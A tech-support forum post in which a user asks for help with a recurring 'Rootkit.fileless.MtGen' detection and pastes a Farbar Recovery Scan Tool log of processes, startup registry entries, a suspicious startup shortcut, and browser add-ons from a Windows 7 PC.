Jump to content


Photo

Computer infected with Rootkit.fileless.MtGen


  • Please log in to reply
47 replies to this topic

#1 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 08 April 2017 - 01:59 PM

I ran Malwarebytes and quarantined, deleted, ran scan again and still there.  Thank you for any assistance you can offer.

 

Attached is Malwarebytes log

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
Ran by KEKLR (administrator) on KEKLR-PC (08-04-2017 14:10:21)
Running from C:\Users\KEKLR\Downloads
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIKEE.EXE
( Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCtrl.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\FAX Utility\FUFAXRCV.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\Receiver\Receiver.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\FAX Utility\FUFAXSTM.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\FXSSVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
(Malwarebytes) C:\Program Files (x86)\MALWAREBYTES ANTI-MALWARE\mbam.exe
() C:\Program Files (x86)\Hewlett-Packard\Shared\HpqToaster.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\SelfServicePlugin\SelfServicePlugin.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\SelfServicePlugin\SelfService.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_25_0_0_127_ActiveX.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Farbar) C:\Users\KEKLR\Downloads\FRST64 (1).exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610872 2009-07-21] ()
HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [487424 2010-03-23] (IDT, Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [HPCam_Menu] => c:\Program Files (x86)\Hewlett-Packard\Media\Webcam\MUITransfer\MUIStartMenu.exe [218408 2009-02-25] (CyberLink Corp.)
HKLM-x32\...\Run: [QlbCtrl.exe] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [323640 2009-11-24] ( Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [WirelessAssistant] => C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [498744 2009-07-23] (Hewlett-Packard)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [518496 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [231776 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [653352 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [862248 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [HPADVISOR] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe [1689144 2010-06-30] (Hewlett-Packard)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2363392 2009-11-20] (Hewlett-Packard Company)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-01-16] (Google Inc.)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [721504 2015-09-02] (Microsoft Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180
Tcpip\..\Interfaces\{AFE4A105-7E52-4CB0-9CAE-18A1828C5361}: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-07-21] (HP Inc.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} -  No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {3860DD98-0549-4D50-AA72-5D17D200EE10} hxxp://cdn.scan.onecare.live.com/resource/download/scanner/en-us/wlscctrl2.cab
DPF: HKLM-x32 {3D3B42C2-11BF-4732-A304-A01384B70D68} hxxp://picasaweb.google.com/s/v/60.08/uploader2.cab
DPF: HKLM-x32 {4B54A9DE-EF1C-4EBE-A328-7C28EA3B433A} hxxp://quickscan.bitdefender.com/qsax/qsax.cab
DPF: HKLM-x32 {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} hxxp://download.bitdefender.com/resources/scanner/sources/en/scan8/oscan8.cab
DPF: HKLM-x32 {644E432F-49D3-41A1-8DD5-E099162EEEC5} hxxp://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {9191F686-7F0A-441D-8A98-2FE3AC1BD913} hxxp://acs.pandasoftware.com/activescan/cabs/as2stubie.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: lbxfile - {56831180-F115-11d2-B6AA-00104B2B9943} - C:\Program Files (x86)\Libronix DLS\System\FileProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: lbxres - {24508F1B-9E94-40EE-9759-9AF5795ADF52} - C:\Program Files (x86)\Libronix DLS\System\ResProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default [2017-04-08]
FF Homepage: Mozilla\Firefox\Profiles\rtqcgnqa.default -> hxxps://login.yahoo.com/config/login_verify2?&.src=ym&rl=1
FF Extension: (HP Detect) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\Extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2} [2012-12-08] [not signed]
FF Extension: (Site Deployment Checker) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\deployment-checker@mozilla.org.xpi [2017-04-03]
FF Extension: (Disable Prefetch) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\disable-prefetch@mozilla.org.xpi [2017-04-03]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-04-01] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-03-14] ()
FF Plugin: @java.com/DTPlugin,version=10.6.2 -> C:\Windows\system32\npDeployJava1.dll [2012-08-29] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-03-14] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-06-24] (Citrix Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-03-05] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-05] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @pandasecurity.com/activescan -> C:\Program Files (x86)\Panda Security\ActiveScan 2.0\npwrapper.dll [2010-07-27] (Panda Security, S.L.)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
